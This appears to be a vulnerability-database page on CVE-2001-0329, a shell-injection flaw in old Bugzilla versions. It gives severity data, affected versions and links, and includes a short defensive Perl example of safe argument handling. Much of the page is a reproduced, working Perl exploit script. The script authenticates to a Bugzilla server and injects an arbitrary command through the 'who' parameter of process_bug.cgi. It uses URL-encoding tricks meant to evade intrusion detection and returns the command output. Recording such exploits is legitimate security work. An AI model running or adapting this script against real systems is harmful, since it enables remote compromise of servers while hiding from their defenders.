CVE-2001-0329
CVSS7.5
Published: 2001-06-27 00:00:00
Revised: 2008-09-10 15:07:46

[Original] Bugzilla 2.10 allows remote attackers to execute arbitrary commands via shell metacharacters in a username that is then processed by (1) the Bugzilla_login cookie in post_bug.cgi, or (2) the who parameter in process_bug.cgi.


[CNNVD] Bugzilla Remote Arbitrary Command Execution Vulnerability (CNNVD-200106-140)

        Bugzilla 2.10 contains a vulnerability. A remote attacker can execute arbitrary commands via shell metacharacters in a username, which are processed by (1) the Bugzilla_login cookie in post_bug.cgi or (2) the who parameter in process_bug.cgi.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:mozilla:bugzilla:2.8   Mozilla Bugzilla 2.8
cpe:/a:mozilla:bugzilla:2.10  Mozilla Bugzilla 2.10
cpe:/a:mozilla:bugzilla:2.4   Mozilla Bugzilla 2.4
cpe:/a:mozilla:bugzilla:2.6   Mozilla Bugzilla 2.6

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0329
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0329
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-140
(official data source) CNNVD

- Other links and resources

http://www.atstake.com/research/advisories/2001/a043001-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A043001-1
http://www.securityfocus.com/bid/1199
(UNKNOWN)  BID  1199
http://www.mozilla.org/projects/bugzilla/security2_12.html
(UNKNOWN)  CONFIRM  http://www.mozilla.org/projects/bugzilla/security2_12.html

- Vulnerability information

Bugzilla Remote Arbitrary Command Execution Vulnerability
High severity  Input validation
2001-06-27 00:00:00 2005-10-20 00:00:00
Remote
        Bugzilla 2.10 contains a vulnerability. A remote attacker can execute arbitrary commands via shell metacharacters in a username, which are processed by (1) the Bugzilla_login cookie in post_bug.cgi or (2) the who parameter in process_bug.cgi.

- Advisories and patches

        The vendor has addressed this issue in Bugzilla versions 2.12 and later.
        Mozilla Bugzilla 2.10
        Mozilla Bugzilla 2.4
        Mozilla Bugzilla 2.6
        Mozilla Bugzilla 2.8

- Vulnerability information (19909)

Mozilla Bugzilla 2.4/2.6/2.8/2.10 Remote Arbitrary Command Execution (EDBID:19909)
cgi remote
2000-05-11 Verified
0 Frank van Vliet karin
N/A
source: http://www.securityfocus.com/bid/1199/info

Bugzilla is a web-based bug-tracking system based on Perl and MySQL. It allows people to submit bugs and catalogs them. 

Bugzilla is prone to a vulnerability which may allow remote users to execute arbitrary commands on the target webserver. 

When accepting a bug report, the script "process_bug.cgi" calls "./processmail" via a Perl system() call whose arguments are a number of parameters with values originating from user input via a web form. The script performs no checks on these values for shell metacharacters before inserting them into the system() call. 

As a result, it is possible for an attacker to supply maliciously crafted input to form fields which, when submitted, will cause arbitrary commands to be executed on the shell of the host running vulnerable versions of Bugzilla. Commands will be executed with the privileges of the webserver process.
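
The following is an added illustration, not Bugzilla's code and not the fix the vendor shipped in 2.12: it builds (without running) the kind of interpolated-string system() call the advisory describes, then shows two defensive measures, an allowlist on the login field and list-form system(), which bypasses /bin/sh entirely. The function names, the sample input and the use of echo as a stand-in for ./processmail are assumptions of this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed sample input shaped like the advisory's case: a login/"who"
# value that smuggles a shell metacharacter (no real target is involved).
my $bug_id = 42;
my $who    = 'user@example.com;id';

# The vulnerable pattern: a single interpolated string makes system() run
# the command through /bin/sh, so ';', '|', '`' and friends in $login are
# interpreted as shell syntax. The string is only built here, never run.
sub unsafe_command {
    my ($id, $login) = @_;
    return "./processmail $id $login";
}

# Defence 1: allowlist the untrusted field before any use. Anything that is
# not a plain local-part@domain is rejected outright.
sub is_valid_login {
    my ($login) = @_;
    return $login =~ /\A[\w.+-]+\@[\w-]+(?:\.[\w-]+)+\z/ ? 1 : 0;
}

# Defence 2: list-form system() calls execvp() directly and never starts a
# shell, so each argument reaches the child program literally.
# 'echo' stands in for ./processmail so the example runs anywhere (assumed).
sub run_processmail {
    my ($id, $login) = @_;
    die "bad bug id\n"             unless $id =~ /\A\d+\z/;
    die "rejected login: $login\n" unless is_valid_login($login);
    return system('echo', 'processmail', $id, $login) == 0;
}

print "string the vulnerable pattern would hand to /bin/sh:\n  ",
      unsafe_command($bug_id, $who), "\n";
print "allowlist verdict for '$who': ",
      (is_valid_login($who) ? 'accept' : 'reject'), "\n";

# Even with no allowlist, the list form passes the value as one literal
# argument; echo prints it back unchanged and no second command runs.
system('echo', 'argument as seen by the child:', $who);

# The layered version: rejected first by validation, then accepted for
# a well-formed login.
eval { run_processmail($bug_id, $who); 1 } or print "blocked: $@";
run_processmail($bug_id, 'user@example.com') or die "processmail failed\n";
```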


#!/usr/bin/perl

# Bugzilla 2.8 remote exploit
# by {} - karin@root66.nl.eu.org
# 	RooT66		- http://root66.nl.eu.org
# 	ShellOracle	- http://www.shelloracle.cjb.net
# 	b0f		- http://b0f.freebsd.lublin.pl
# 	
# This exploits uses antiIDS tricks ripped from whisker

# next 2 functions stolen from whisker, commented by me
sub rstr { # no, this is not a cryptographically-robust number generator
        my ($str, $c);
        $drift=(rand() * 10) % 10;
        for($c=0;$c<10+$drift;$c++){
        $str .= chr(((rand() * 26) % 26) + 97);} # yes, we only use a-z
        return $str;}

sub antiIDS {
	($url) = (@_);
        $url =~s/([-a-zA-Z0-9.\<\>\\\|\'\`])/sprintf("%%%x",ord($1))/ge;
	$url =~ s/\ /+/g;
        $url =~s/\//\/.\//g;
	return $url;
}
#end of stolen stuff

($complete_url, $Bugzilla_login, $Bugzilla_password, $command) = (@ARGV);         

print("Exploit for Bugzilla up to version 2.8\n");
print("        by {} - karin\@root66.nl.eu.org\n");
print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
print("RooT66		- http://root66.nl.eu.org\n");
print("ShellOracle	- http://www.shelloracle.cjb.net\n");
print("b0f		- http://b0f.freebsd.lublin.pl\n");
print("\n");

if ($complete_url eq "-h" || $complete_url eq "--help") {
	print("Usage: $0 url emailaddress password command\n");
	exit;
}

# Get information of user
if (!$complete_url) {
	print("URL: ");
	$complete_url = <STDIN>; chomp($complete_url); $complete_url =~ s/http:\/\///;
}
if (!$Bugzilla_login) {
	print("EMAIL: ");
	$Bugzilla_login = <STDIN>; chomp($Bugzilla_login);
}
if (!$Bugzilla_password) {
	print("PASSWORD: ");
	$Bugzilla_password = <STDIN>; chomp($Bugzilla_password);
}
if (!$command) {
	print("COMMAND: ");
	$command = <STDIN>; chomp($command);
}


# Set some variables
$host = $complete_url; $host =~ s/\/.*//;
$base_dir = $complete_url; $base_dir =~ s/^$host//; $base_dir =~ s/[a-zA-Z.]*$//;

# Make own directory
system("mkdir $$");

print("Getting information needed to submit our 'bug'\n");
# Get product name
system("cd $$; lynx -source \"http://$host/" . antiIDS("$base_dir/enter_bug.cgi") .  "?Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password") . "\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
	if ($input =~ /enter_bug.cgi\?product=/) {
		chomp($input);
		$product = $input;
		$product =~ s/.*product=//;
		$product =~ s/".*//;
		if ($product =~ /\&component=/) {
			$component = $product;
			$product =~ s/&.*//;		# strip component
			$component =~ s/.*component=//;
			$component =~ s/".*//;
		}
	}
}
print("\tProduct: $product\n");
if ($component) {
	print("\tComponent: $component\n");
	}
# Get more information
$page = antiIDS("$base_dir/enter_bug.cgi?") . "product=" . antiIDS("$product") . "&Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password");
system("cd $$; lynx -dump \"http://$host/$page\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
	chomp($input);
	if ($input =~ /Reporter:/) {
		$reporter = $input;
		$reporter =~ s/.*Reporter: //;
		$reporter =~ s/\ .*//;
	}
	if ($input =~ /Version:/) {
		$version = $input;
		$version =~ s/.*Version: \[//;
		$version =~ s/\.*\].*//;
	}
	if ($input =~ /Component:/) {
		$component = $input;
		$component =~ s/.*Component: \[//;
		$component =~ s/\.*\].*//;
	}
	if ($input =~ /Platform:/) {
		$platform = $input;
		$platform =~ s/.*Platform: \[//;
		$platform =~ s/\.*\].*//;
	}
	if ($input =~ /OS:/) {
		$os = $input;
		$os =~ s/.*OS: \[//;
		$os =~ s/\.*\].*//;
	}
	if ($input =~ /Priority:/) {
		$priority = $input;
		$priority =~ s/.*Priority: \[//;
		$priority =~ s/\].*//;
	}
	if ($input =~ /Severity:/) {
		$severity = $input;
		$severity =~ s/.*Severity: \[//;
		$severity =~ s/\.*\].*//;
	}
}
print("\tReporter: $reporter\n");
print("\tVersion: $version\n");
print("\tComponent: $component\n");
print("\tPlatform: $platform\n");
print("\tOS: $os\n");
print("\tPriority: $priority\n");
print("\tSeverity: $severity\n");
close(FILE);


#liftoff
print("Sending evil bug report\n");
$page = antiIDS("$base_dir/process_bug.cgi") .  "?bug_status=" . antiIDS("NEW") . "&reporter=" . antiIDS($reporter) . "&product=" . antiIDS("$product") . "&version=" . antiIDS("$version") . "&component=" . antiIDS("$component") . "&rep_platform=" . antiIDS("$platform") . "&op_sys=" . antiIDS($os) . "&priority=" . antiIDS($priority) . "&bug_severity=" . antiIDS($severity) . "&who=". antiIDS("blaat\@blaat.com;echo \\<pre\\>START OUTPUT COMMAND;$command;echo \\<\\/pre\\>END OUTPUT COMMAND;") . "&knob=" . antiIDS("duplicate") . "&dup_id=" . antiIDS("202021234123412341234") . "&Bugzilla_login=" . antiIDS($Bugzilla_login) . "&Bugzilla_password=" . antiIDS($Bugzilla_password) . "&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&form_name=enter_bug";
system("cd $$; lynx -dump \"$host/$page\" > enter_bug.cgi");	
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
	chomp($input);
	if ($input =~ /END OUTPUT COMMAND/) {
		$startoutput = 0;
	}
	if ($startoutput) {
		print("$input\n");
	}
	if ($input =~ /START OUTPUT COMMAND/) {
	$startoutput = 1;
	}
}
close(FILE);
# Delete shit
# system("rm -rf $$");
		

- Vulnerability information

6364
Bugzilla post_bug.cgi Bugzilla_login Cookie Arbitrary Command Execution

- Vulnerability description

Unknown or Incomplete

- Timeline

2000-05-11 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete